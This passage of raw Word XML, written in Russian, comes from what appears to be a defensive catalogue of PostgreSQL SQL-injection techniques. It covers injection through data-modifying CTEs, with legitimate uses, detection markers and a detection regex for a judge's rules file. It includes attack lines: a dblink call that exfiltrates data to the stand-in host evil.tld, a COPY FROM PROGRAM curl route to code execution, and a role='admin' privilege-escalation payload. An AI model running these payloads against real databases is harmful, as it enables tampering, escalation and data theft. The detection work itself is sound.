          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не увидит вставленную в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081EFF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Constraint-проверки (UNIQUE, FK) применяются в конце команды — два CTE могут попытаться вставить конфликтующие строки, конфликт сработает только при commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF4A11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382953A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.1+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые версии 13–17 включают это).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247A1F15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на целевую таблицу + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USAGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на схему. Без write-привилегии CTE падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permission denied for table ...</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C072910" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не нужно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stacked queries или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>-разделение — одна команда.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF531C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не нужно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC доступ к каталогам — payload использует только пользовательские таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE41C3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично на AWS RDS / Cloud SQL / Supabase. CTE с DML — стандартная PG-фича, провайдеры её не отключают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BF313" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049129E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Data-modifying CTE — частый паттерн в legitimate-коде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C14D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Move row»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH del AS (DELETE FROM staging WHERE ready=true RETURNING *) INSERT INTO main SELECT * FROM del</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D981CA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Update + log»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH upd AS (UPDATE orders SET status='paid' WHERE id=$1 RETURNING id, user_id) INSERT INTO audit (order_id, user_id, action) SELECT id, user_id, 'paid' FROM upd</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8EF986" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Conditional upsert»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH new AS (INSERT INTO users(email) VALUES ($1) ON CONFLICT DO NOTHING RETURNING id), found AS (SELECT id FROM users WHERE email=$1) SELECT id FROM new UNION ALL SELECT id FROM found LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B074385" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Маркеры атаки vs легитимного использования:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B64E35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Точка вызова в коде</w:t>
      </w:r>
      <w:r>
        <w:t>: legitimate CTE-DML определены в коде как фиксированные SQL-template-ы (не f-string, не конкатенация). Атака — CTE возникает из user-input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE34210" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: записи с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS (UPDATE ... WHERE ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-клауза каждый раз разная (плановая параметризация на стороне PG), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> целевой таблицы — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user_sessions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_resets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (целевые таблицы для атаки). Легитимные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-DML обычно на специфичные staging/audit-таблицы, не на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A2E7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP-метод</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: атака почти всегда через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (потому что POST/PUT/DELETE-эндпоинты обычно ожидают write и проверяются строже). Если в логах web-сервера видны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запросы, которые создают записи в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это сигнал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586409D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_user_tables.n_tup_ins` / `n_tup_upd` / `n_tup_del`</w:t>
      </w:r>
      <w:r>
        <w:t>: рост счётчиков на таблицах, в которые эндпоинт «не должен» писать. Полезный сигнал для DBA-аудита.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A697A49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8525A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.1 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые) — фича стабильна с 9.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02370E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает везде. Это core SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607078E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 14+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> команда (https://www.postgresql.org/docs/current/sql-merge.html) добавляет ещё один вектор внутри CTE — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH m AS (MERGE INTO t USING s ON ... WHEN MATCHED THEN UPDATE ... WHEN NOT MATCHED THEN INSERT ... RETURNING ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t>. MERGE имеет специфику с RLS — см. 3.17.2 (CVE-2024-10978 / R8 — обход RLS на UPDATE/SELECT policy через MERGE в PG 15.0–15.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9828B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1CB90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главное противопоставление: 3.5 требует мульти-стейтмент через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>, 3.10.1 — одна команда. В extended-protocol drivers (psycopg3 / asyncpg / pgjdbc default) 3.5 блокируется, 3.10.1 — нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B2E93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UNION-обёртка для CTE-результата, чтобы данные проникли в HTTP-ответ. Без UNION CTE выполняет write, но read-effect для атакующего отсутствует (slept atomic write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6A062" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива UNION: вместо UNION использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для leak через ошибку. CTE+CAST дают write+leak в одной команде без необходимости совпадения column-count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533A76A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ex AS (INSERT INTO logs VALUES (current_user) RETURNING current_user) SELECT dblink_connect('host=' || (SELECT current_user FROM ex) || '.evil.tld...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — write + OOB exfiltration в одной команде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA8937" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ins AS (COPY t FROM PROGRAM 'curl ...' RETURNING ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (COPY не разрешён в CTE). Чтобы выполнить COPY FROM PROGRAM в CTE-сценарии — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с side-effect-функцией, которая внутри делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'COPY ...'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5ED89F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Payload B (UPDATE role='admin') — это сам по себе акт privilege escalation на уровне application; 3.13 — на уровне PG-роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A93D35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.2 (RLS bypass via MERGE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пересечение через MERGE-команду (R11, CVE-2024-10978). MERGE в CTE даёт цепочку «обход extended-protocol + обход RLS».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529DCE07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — частично покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bWITH\b.*\b(INSERT|UPDATE|DELETE)\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> присутствует в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cte_dml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, поднимает risk до 7. Не покрыта: DML в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-форме CTE и в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-форме. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.10 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
